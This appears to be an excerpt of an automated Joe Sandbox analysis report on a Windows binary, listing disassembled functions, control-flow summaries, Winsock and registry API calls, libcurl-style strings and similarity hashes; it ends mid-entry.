                                                          • Associated: 00000000.00000002.1404774647.0000000000240000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1404794681.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1404794681.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405264764.000000000091C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA9000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000CB9000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405701086.0000000000CBA000.00000080.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405827183.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405859205.0000000000E79000.00000080.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_240000_s8kPMNXOZY.jbxd
                                                          Similarity
                                                          • API ID: Sleepconnectgetsockopt
                                                          • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                                          • API String ID: 1669343778-879669977
                                                          • Opcode ID: 0355f42b985fbe60b308ab19b824d2b180fc677479a97d1dde375f21d469ac56
                                                          • Instruction ID: 991c539817d3bc8d537830eb390214130bc6a3b879038579c286765b2fc58a5f
                                                          • Opcode Fuzzy Hash: 0355f42b985fbe60b308ab19b824d2b180fc677479a97d1dde375f21d469ac56
                                                          • Instruction Fuzzy Hash: 83B1A1706543069FD724CF24C889B66B7A0AF45318F04C52DE85D9B2D2EB70E864CB62

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph: entry 0x30aa30; basic blocks 1445–1542 covering 0x30aa30–0x30af1f. Blocks that call imports: 1464 (0x30ab96–0x30abab) socket; 1470 (0x30abd0–0x30abed) ioctlsocket; 1501 (0x30ada0–0x30adb2) connect. Other blocks branch or call internal routines (0x2fe180, 0x2fe730, 0x2fe760, 0x2fe7c0, 0x2fea60, 0x2febf0, 0x30af70); the node/edge list of the rendered graph is omitted.
                                                          APIs
                                                          • socket.WS2_32(FFFFFFFF,?,00000000), ref: 0030AB9B
                                                          • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 0030ABE4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1404794681.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                          • Associated: 00000000.00000002.1404774647.0000000000240000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1404794681.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1404794681.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405264764.000000000091C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA9000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000CB9000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405701086.0000000000CBA000.00000080.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405827183.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405859205.0000000000E79000.00000080.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_240000_s8kPMNXOZY.jbxd
                                                          Similarity
                                                          • API ID: ioctlsocketsocket
                                                          • String ID: ;z~$XLm$`Lm
                                                          • API String ID: 416004797-3316657296
                                                          • Opcode ID: 89f1138617673d542bd59724f88f9e7a19899f49a36a33bd51de05b5f709efb3
                                                          • Instruction ID: 93c0075bc0d41fc194fdbdc81d618fddfec36206ae3e9f2292ba6d9fda1fd04e
                                                          • Opcode Fuzzy Hash: 89f1138617673d542bd59724f88f9e7a19899f49a36a33bd51de05b5f709efb3
                                                          • Instruction Fuzzy Hash: 3AE1D0706057029BEB21CF24E8A5B6BB7E5EF85300F054A2CF9988B2D1E775D944CB92

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph: entry 0x242f17; basic blocks 1544–1565 covering 0x242f17–0x2431d6. Blocks that call imports: 1550 (0x242f91–0x242ff4) RegOpenKeyExA; 1556 (0x24315c–0x2431ac) RegEnumKeyExA; 1557 (0x243010–0x243083) RegOpenKeyExA; 1563 (0x243089–0x2430d4) RegQueryValueExA; 1565 (0x24313b–0x24314b) RegCloseKey. The edges 1556→1557→1563→1565→1562→1556 form a loop over subkeys (enumerate, open subkey, query a value, close, next). Other blocks call internal routines (0x241619, 0x6c8050, 0x6c98f0, 0x6c9af0, 0x6c9bc0, 0x6c9c50, 0x6c9ce0); the node/edge list of the rendered graph is omitted.
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1404794681.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                          • Associated: 00000000.00000002.1404774647.0000000000240000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1404794681.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1404794681.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405264764.000000000091C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA9000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000CB9000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405701086.0000000000CBA000.00000080.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405827183.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405859205.0000000000E79000.00000080.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_240000_s8kPMNXOZY.jbxd
                                                          Similarity
                                                          • API ID: EnumOpen
                                                          • String ID: d
                                                          • API String ID: 3231578192-2564639436
                                                          • Opcode ID: 810c604d4b1fea03e37e18b1dcf0e7d82b099612b8dd44aeee8d6dc75f633b06
                                                          • Instruction ID: 4143d70250c9e5ddc345a9c96516b263c94244fcf9f15c49b5d39902017e70a7
                                                          • Opcode Fuzzy Hash: 810c604d4b1fea03e37e18b1dcf0e7d82b099612b8dd44aeee8d6dc75f633b06
                                                          • Instruction Fuzzy Hash: CB7195B49143199FDB50DF69C98579EBBF0BF84308F10896DE49897301D7749A88CF92

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph: entry 0x2476a0; basic blocks 1578–1586 covering 0x2476a0–0x247762. Block that calls an import: 1579 (0x2476e6–0x2476f2) send. Other blocks branch or call internal routines (0x2472a0, 0x24cb20, 0x5c8c50); the node/edge list of the rendered graph is omitted.
                                                          APIs
                                                          • send.WS2_32(multi.c,?,?,?,N=$,00000000,?,?,002507BF), ref: 002476EB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1404794681.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                          • Associated: 00000000.00000002.1404774647.0000000000240000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1404794681.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1404794681.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405264764.000000000091C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA9000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000CB9000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405701086.0000000000CBA000.00000080.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405827183.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405859205.0000000000E79000.00000080.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_240000_s8kPMNXOZY.jbxd
                                                          Similarity
                                                          • API ID: send
                                                          • String ID: LIMIT %s:%d %s reached memlimit$N=$$SEND %s:%d send(%lu) = %ld$multi.c$send
                                                          • API String ID: 2809346765-1652192185
                                                          • Opcode ID: b0818a76bb9eda513695f09820065f905279d19624cb4a8063a28d1e25819dab
                                                          • Instruction ID: 8b200467af48c9649f73b4ded0ec5e01d846bbe986d1d7c1a1e389a788411b80
                                                          • Opcode Fuzzy Hash: b0818a76bb9eda513695f09820065f905279d19624cb4a8063a28d1e25819dab
                                                          • Instruction Fuzzy Hash: C01127F17393057BE214AB189C9AE677B9CDBC2B28F450918FC1556242D2A19D10C6B1

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1788 279290-2792ed call 2476a0 1791 2793c3-2793ce 1788->1791 1792 2792f3-2792fb 1788->1792 1801 2793e5-279427 call 25d090 call 284f40 1791->1801 1802 2793d0-2793e1 1791->1802 1793 279301-279333 call 25d8c0 call 25d9a0 1792->1793 1794 2793aa-2793af 1792->1794 1813 2793a7 1793->1813 1814 279335-279364 WSAIoctl 1793->1814 1795 279456-279470 1794->1795 1796 2793b5-2793bc 1794->1796 1799 2793be 1796->1799 1800 279429-279431 1796->1800 1799->1795 1804 279433-279437 1800->1804 1805 279439-27943f 1800->1805 1801->1795 1801->1800 1802->1796 1806 2793e3 1802->1806 1804->1795 1804->1805 1805->1795 1809 279441-279453 call 2850a0 1805->1809 1806->1795 1809->1795 1813->1794 1817 279366-27936f 1814->1817 1818 27939b-2793a4 1814->1818 1817->1818 1820 279371-279390 setsockopt 1817->1820 1818->1813 1820->1818 1821 279392-279395 1820->1821 1821->1818
                                                          APIs
                                                          • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 0027935D
                                                          • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 00279389
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1404794681.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                          • Associated: 00000000.00000002.1404774647.0000000000240000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1404794681.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1404794681.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405264764.000000000091C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA9000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000CB9000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405701086.0000000000CBA000.00000080.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405827183.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405859205.0000000000E79000.00000080.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_240000_s8kPMNXOZY.jbxd
                                                          Similarity
                                                          • API ID: Ioctlsetsockopt
                                                          • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                                          • API String ID: 1903391676-2691795271
                                                          • Opcode ID: 7ea1a65fa57a50c7008af17af36898699490bfb2d7f905b0466c8fa32771c201
                                                          • Instruction ID: 9624c437d6c769152e9e7806c429e27a05faab3d7e322e362928d813adef63f2
                                                          • Opcode Fuzzy Hash: 7ea1a65fa57a50c7008af17af36898699490bfb2d7f905b0466c8fa32771c201
                                                          • Instruction Fuzzy Hash: C551C070610306ABDB14DF24C881FAAB7A5FF89314F14C569FD5C9B282E730E9A1CB91

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1822 2f4950-2f4964 1823 2f4966-2f4970 1822->1823 1824 2f4995-2f4999 1822->1824 1825 2f499b-2f499f 1823->1825 1826 2f4972-2f497d 1823->1826 1824->1825 1824->1826 1827 2f497f-2f498a 1825->1827 1828 2f49a1-2f49a5 1825->1828 1826->1827 1826->1828 1829 2f498c-2f4993 1827->1829 1830 2f49a7-2f49b7 call 2ff3a0 1827->1830 1828->1829 1828->1830 1829->1830 1833 2f49b9-2f49bf 1830->1833 1834 2f4a05-2f4a0e 1830->1834 1837 2f49c5-2f49c9 1833->1837 1838 2f4a74-2f4a82 1833->1838 1835 2f4b26-2f4b2d 1834->1835 1836 2f4a14-2f4a43 call 2fb590 1834->1836 1836->1835 1858 2f4a49-2f4a67 call 2fbbe0 call 2febf0 1836->1858 1839 2f49cf-2f49d5 1837->1839 1840 2f4ad9-2f4ae6 1837->1840 1849 2f4b2e-2f4b33 1838->1849 1850 2f4a88-2f4a92 1838->1850 1842 2f4aec-2f4b0c call 3078a0 1839->1842 1843 2f49db-2f49df 1839->1843 1840->1842 1840->1843 1847 2f49e5-2f49fa 1842->1847 1848 2f4b12-2f4b14 1842->1848 1843->1847 1843->1848 1854 2f4b16-2f4b23 1847->1854 1855 2f4a00 1847->1855 1848->1835 1848->1854 1849->1835 1851 2f4aa0-2f4aad gethostname 1850->1851 1856 2f4b35-2f4b37 1851->1856 1857 2f4ab3-2f4abe 1851->1857 1854->1835 1855->1835 1859 2f4b3c-2f4b49 call 5c8d90 1856->1859 1860 2f4b39 1856->1860 1857->1860 1866 2f4ac0-2f4ad2 1857->1866 1858->1833 1872 2f4a6d-2f4a6f 1858->1872 1859->1837 1869 2f4b4f-2f4b69 1859->1869 1860->1859 1866->1851 1873 2f4ad4 1866->1873 1869->1854 1876 2f4b6b-2f4b80 call 3078a0 1869->1876 1872->1835 1875 2f4b8e-2f4b93 1873->1875 1875->1854 1876->1875 1879 2f4b82-2f4b89 1876->1879 1879->1837
                                                          APIs
                                                          • gethostname.WS2_32(00000000,00000040), ref: 002F4AA4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1404794681.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                          • Associated: 00000000.00000002.1404774647.0000000000240000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1404794681.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1404794681.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405264764.000000000091C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA9000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000CB9000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405701086.0000000000CBA000.00000080.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405827183.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405859205.0000000000E79000.00000080.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_240000_s8kPMNXOZY.jbxd
                                                          Similarity
                                                          • API ID: gethostname
                                                          • String ID: XLm$\Lm$`Lm
                                                          • API String ID: 144339138-141128817
                                                          • Opcode ID: d3238f49e478502ce60df3251118e1140e3c01c2e4f990b22ccf4c7a15e80e2d
                                                          • Instruction ID: c38f437253d4a66f8111b01bc60d9d45312a2d291816af468d0ef9aded5b68a0
                                                          • Opcode Fuzzy Hash: d3238f49e478502ce60df3251118e1140e3c01c2e4f990b22ccf4c7a15e80e2d
                                                          • Instruction Fuzzy Hash: CE51D370A2430A8BE731AF25DD49733B6D4AF41399F04093DEB8A866D2E7F5E864C701

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1880 247770-24778e 1881 2477b6-2477c2 recv 1880->1881 1882 247790-247797 1880->1882 1884 2477c4-2477d9 call 2472a0 1881->1884 1885 24782e-247832 1881->1885 1882->1881 1883 247799-2477a1 1882->1883 1886 2477a3-2477b4 1883->1886 1887 2477db-247829 call 2472a0 call 24cb20 call 5c8c50 1883->1887 1884->1885 1886->1884 1887->1885
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1404794681.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                          • Associated: 00000000.00000002.1404774647.0000000000240000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1404794681.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1404794681.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405264764.000000000091C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA9000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000CB9000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405701086.0000000000CBA000.00000080.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405827183.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405859205.0000000000E79000.00000080.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_240000_s8kPMNXOZY.jbxd
                                                          Similarity
                                                          • API ID: recv
                                                          • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                                          • API String ID: 1507349165-640788491
                                                          • Opcode ID: a3c2cd557272d149e4e23951ccfe8d253d4f6adcfa1e70d3159918ecb6ffdeae
                                                          • Instruction ID: 0359796c5b17ca66cdf42266bab06aa331a6b40324ecd1e14a46a00b4c2ecd53
                                                          • Opcode Fuzzy Hash: a3c2cd557272d149e4e23951ccfe8d253d4f6adcfa1e70d3159918ecb6ffdeae
                                                          • Instruction Fuzzy Hash: 821127F4B393047BE1249B249C4AE67BB9CDBC6F68F444928F81493242D7619D10C5F1

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1899 2475e0-2475ed 1900 247607-247629 socket 1899->1900 1901 2475ef-2475f6 1899->1901 1903 24763f-247642 1900->1903 1904 24762b-24763c call 2472a0 1900->1904 1901->1900 1902 2475f8-2475ff 1901->1902 1905 247601-247602 1902->1905 1906 247643-247699 call 2472a0 call 24cb20 call 5c8c50 1902->1906 1904->1903 1905->1900
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1404794681.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                          • Associated: 00000000.00000002.1404774647.0000000000240000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1404794681.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1404794681.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405264764.000000000091C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA9000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000CB9000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405701086.0000000000CBA000.00000080.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405827183.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405859205.0000000000E79000.00000080.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_240000_s8kPMNXOZY.jbxd
                                                          Similarity
                                                          • API ID: socket
                                                          • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                                          • API String ID: 98920635-842387772
                                                          • Opcode ID: 7bef54a410fa783fc43942c7e8af83f2fa722111d25cb80205e4aae3262c8b79
                                                          • Instruction ID: 36739f408deef961fa39786264094feb2593266c388bffe18bbf7dce0f6d87b9
                                                          • Opcode Fuzzy Hash: 7bef54a410fa783fc43942c7e8af83f2fa722111d25cb80205e4aae3262c8b79
                                                          • Instruction Fuzzy Hash: B21188B2B2421237E6109F2CAC1AFDB3F9DDF81B24F054924F820962A2D322CD64D6D1

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1917 27a150-27a159 1918 27a250 1917->1918 1919 27a15f-27a17b 1917->1919 1920 27a181-27a1ce getsockname 1919->1920 1921 27a249-27a24f 1919->1921 1922 27a1f7-27a214 call 27ef30 1920->1922 1923 27a1d0-27a1f5 call 25d090 1920->1923 1921->1918 1922->1921 1928 27a216-27a23b call 25d090 1922->1928 1930 27a240-27a246 call 284f40 1923->1930 1928->1930 1930->1921
                                                          APIs
                                                          • getsockname.WS2_32(?,?,00000080), ref: 0027A1C7
                                                          Strings
                                                          • ssloc inet_ntop() failed with errno %d: %s, xrefs: 0027A23B
                                                          • getsockname() failed with errno %d: %s, xrefs: 0027A1F0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1404794681.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                          • Associated: 00000000.00000002.1404774647.0000000000240000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1404794681.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1404794681.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405264764.000000000091C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA9000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000CB9000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405701086.0000000000CBA000.00000080.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405827183.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405859205.0000000000E79000.00000080.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_240000_s8kPMNXOZY.jbxd
                                                          Similarity
                                                          • API ID: getsockname
                                                          • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                                          • API String ID: 3358416759-2605427207
                                                          • Opcode ID: 2289e21d3822c74bbb465c8eb0ffab59aad478702cdd2e20f079c5dae6ff58f2
                                                          • Instruction ID: 11cc51f3f896750b2ab7f8f214ba335815bba06849418adedffbad012266c20f
                                                          • Opcode Fuzzy Hash: 2289e21d3822c74bbb465c8eb0ffab59aad478702cdd2e20f079c5dae6ff58f2
                                                          • Instruction Fuzzy Hash: 8C210631818281AAF6219B18DC46FE773ACEF91328F044654FD8853052FA3269958BE2

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1937 25d5e0-25d5ee 1938 25d5f0-25d604 call 25d690 1937->1938 1939 25d652-25d662 WSAStartup 1937->1939 1945 25d606-25d614 1938->1945 1946 25d61b-25d651 call 267620 1938->1946 1941 25d664-25d66f 1939->1941 1942 25d670-25d676 1939->1942 1942->1938 1943 25d67c-25d68d 1942->1943 1945->1946 1951 25d616 1945->1951 1951->1946
                                                          APIs
                                                          • WSAStartup.WS2_32(00000202), ref: 0025D65B
                                                          Strings
                                                          Memory Dump Source
